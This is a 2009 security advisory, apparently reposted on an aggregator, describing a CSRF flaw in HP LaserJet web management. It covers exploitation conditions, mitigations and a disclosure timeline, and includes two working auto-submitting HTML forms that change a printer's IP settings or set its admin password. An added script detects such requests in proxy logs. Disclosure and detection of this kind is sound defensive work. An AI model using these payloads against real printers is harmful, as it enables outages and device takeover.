HP Laserjet multiple models web management CSRF

2009-03-17 / 2009-03-18
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-352

Louhi Networks Oy -= Security Advisory =-

Advisory: HP LaserJet multiple models web management CSRF vulnerability & insecure default configuration
Release Date: 2009-03-17
Last Modified: 2009-03-17
Authors: Henri Lindberg, CISA [henri d0t lindberg at louhi d0t fi]
Application: HP Embedded Web Server
Devices: HP LaserJet M1522n MFP, HP Color LaserJet 2605dtn, possibly other HP products
Attack type: CSRF
Risk: Low
Vendor Status: Issue documented in a customer notice
References:
http://www.louhinetworks.fi/advisory/HP_20090317.txt
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01684566

Overview:
Quote from http://www.hp.com: "Increase effectiveness and productivity with an easy-to-use high-performance HP MFP. HP spherical toner and an intelligent cartridge optimise print quality and reliability. Do more with fast, high-quality print, copy, scan and fax functionality. This affordable HP MFP delivers print, copy, scan and fax functionality. Hi-Speed USB 2.0 connectivity and fast, secure networking enable you to easily share this device. Handle complex files with a 450 MHz processor and memory up to 64 MB."

Details:
The default configuration of the device does not require the user to define a password for configuration changes. This insecure out-of-the-box configuration, combined with a CSRF vulnerability in the web management interface, allows an attacker to perform unwanted configuration changes through the user's browser.

Successful exploitation requires:
1) Out-of-the-box configuration (no management password)
2) An internal user with access to the web management interface
3) Knowledge of the target printer's DNS name or IP address
4) The ability to lure the internal user to a malicious website, or to inject malicious HTML/JavaScript into a website frequented by said internal user

The simplest management interfaces contain few interesting features; the most significant impact can be achieved with an invalid network configuration. This results in a denial-of-service condition, requiring manual reconfiguration in order to restore network connectivity. More advanced management interfaces based on the same software may contain additional features suitable for exploitation. It is recommended to check the features of the management interface in order to determine the actual risk for the product in use.

Mitigation:
1) Set an administrator password
2) Do not browse untrusted sites while logged on to the management interface

Advisory timeline:
2009-02-17 Contacted vendor through e-mail.
2009-02-17 Vendor response.
2009-03-12 Vendor decides not to patch but to release a customer notice.
2009-03-17 Coordinated release of information.

Vendor's customer notice:
HP Security Notice HPSN-2009-001 rev.1
HP LaserJet Printers, HP Edgeline Printers, and HP Digital Senders - Unverified Input

Proof of Concept:

<html>
<head><title>Network</title></head>
<body onload="document.CSRF.submit();">
<FORM name="CSRF" method="post" ACTION="http://1.2.3.4/hp/device/config_result_YesNo.html/config" style="display:none">
<input name="Clear" value="Yes">
<input name="Menu" value="NetIPChange">
<input name="Configuration" value="IPConfig=Man&amp;IPAddr=1.1.1.1&amp;SN=2.2.2.2&amp;GW=3.3.3.3&amp;WINS=0.0.0.0">
</form>
</body>
</html>

An invalid value for the "Configuration" parameter sets the IP address, mask and gateway to 255.255.255.255.

<html>
<head><title>Set password</title></head>
<body onload="document.CSRF.submit()">
<FORM name="CSRF" method="post" ACTION="http://1.2.3.4/hp/device/set_config_password.html/config" style="display:none">
<INPUT type="password" name="Password" MAXLENGTH="16" VALUE="evil">
<INPUT type="password" name="ConfirmPassword" MAXLENGTH="16" VALUE="evil">
<INPUT type="hidden" VALUE="System">
</FORM>
</body>
</html>
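To spot this attack in network logs, the following added example (not part of the advisory) scans proxy log lines for POSTs to the two management endpoints named in the proof of concept whose Referer host is not the printer itself; the log format, addresses and sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Management endpoints taken from the advisory's proof of concept.
SENSITIVE_PATHS = {
    "/hp/device/config_result_YesNo.html/config",
    "/hp/device/set_config_password.html/config",
}

# Hypothetical proxy log format: "<client> <method> <url> <referer>" ("-" = none).
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")

# Constructed sample traffic: one legitimate same-origin change, two suspect ones.
SAMPLE_LOG = """\
10.0.0.5 GET http://10.0.0.20/ -
10.0.0.5 POST http://10.0.0.20/hp/device/config_result_YesNo.html/config http://10.0.0.20/
10.0.0.7 POST http://10.0.0.20/hp/device/config_result_YesNo.html/config http://lure.example/page.html
10.0.0.7 POST http://10.0.0.20/hp/device/set_config_password.html/config -
"""


def classify(line):
    """Return (client, path, referer_host) when a config POST to a management
    endpoint did not originate from the printer's own pages, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    client, method, url, referer = m.groups()
    target = urlparse(url)
    if method != "POST" or target.path not in SENSITIVE_PATHS:
        return None
    # A missing Referer on a state-changing POST is treated as suspect too: the
    # EWS has no CSRF token, so the Referer is the only origin evidence available.
    ref_host = urlparse(referer).hostname if referer != "-" else None
    if ref_host == target.hostname:
        return None
    return client, target.path, ref_host


def find_suspect_posts(log_text):
    """Collect every suspect configuration POST in a block of log text."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for client, path, ref in find_suspect_posts(SAMPLE_LOG):
        print(f"suspect CSRF: {client} -> {path} (referer host: {ref})")
```

A hit on the second endpoint is the more serious one, since it corresponds to the password-setting form in the proof of concept.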

References:

http://www.securityfocus.com/bid/34143
http://www.securityfocus.com/archive/1/archive/1/501884/100/0/threaded
http://www.louhinetworks.fi/advisory/HP_20090317.txt
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01684566


Copyright 2024, cxsecurity.com